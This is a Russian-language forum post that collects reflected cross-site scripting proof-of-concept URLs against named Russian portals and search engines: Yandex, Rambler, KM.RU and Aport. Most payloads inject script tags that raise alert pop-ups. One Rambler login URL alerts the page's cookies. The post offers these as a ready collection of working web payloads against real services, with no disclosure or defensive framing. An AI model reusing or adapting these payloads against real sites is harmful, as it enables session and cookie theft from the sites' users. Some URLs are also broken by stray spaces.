делаемся так. Знаю что некоторые XSS уже выкладывали но всетаки удобно когда все собрано в одно место
XSS НА ИЗВЕСТНЫХ RUSS-ПОИСКОВИКАХ

Yandex.RU - Internet Explorer
_http://www.yandex.ru/yandsearch?text=gLAnce_was_here&stype="><script>al ert('found_by_gLAnce')</script>
_http://images.yandex.ru/yandsearch?rpt="><script>alert('found_by_gLAnce')</script>&text=xaxa
_http://news.yandex.ru/yandsearch?rpt=nnews2&grhow=clutop&text=sasa&doSea rch="><script>alert('found')</script>

Rambler.RU
_http://www.rambler.ru/db/news/msg.html?mid='"><script>alert('found_by_gLAnce')</script>
_http://weather.rambler.ru/index.html?search=<script>alert('found_by_gLAnce') </script>
_http://tv.rambler.ru/index.html?channel_id="><script>alert('found_by_gL Ance')</script>
_http://foto.rambler.ru/srch?control_charset=huy&sort=0&set=photo&words="> <script>alert('found_by_gLAnce')</script>
_http://horoscopes.rambler.ru/day.html?day=1%22%3E%3Cscript%3Ealert%28%27found_b y_gLAnce%27%29%3C%2Fscript%3E&month=4&year=1965&ge nder=f
_http://www.rambler.ru/db/news/news.html?s="><script>alert(found_by_gLAnce)</script>
_http://cla.rambler.ru/?action=login&error[l_login][value]=privet"><script>javascript:alert(document.cookie) </script>
_http://olymp2006.rambler.ru/winners.html?day=http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert(/XSS/)%3C/script%3E

KM.RU
_http://go.km.ru/index.asp?idr=4&ids=&wdv=0&mrv=1&dti=0&dtv=6&idt=& ann=1&srt=0&itp=2&osq=%3Cscript%3Ealert+%28found_b y_gLAnce%29%3C%2Fscript%3E&P1=&P2=&P3=&ext=0&opt=0 &hlp=0&sr=0&sq=%3Cscript%3Ealert+%28%27found_by_gL Ance%27%29%3C%2Fscript%3E
_http://conference.km.ru/add_question.asp?id="><script>alert('found_by_gLAn ce')</script>
вобщем на км.ру полно css, все писать сюда не буду

Aport.RU
_http://www.aport.ru/help/?p="><script>alert%20('found-by-gLAnce')</script>
_http://ec.aport.ru/scripts/template.dll?r="><script>alert%20('i_vot_tak_vot') </script>&That=goods&Base=eshop&Rt=2&Tn=
_http://sm.aport.ru/scripts/template.dll?That=std&r=\"><script>alert%20(/found_by_gLAnce/)</script>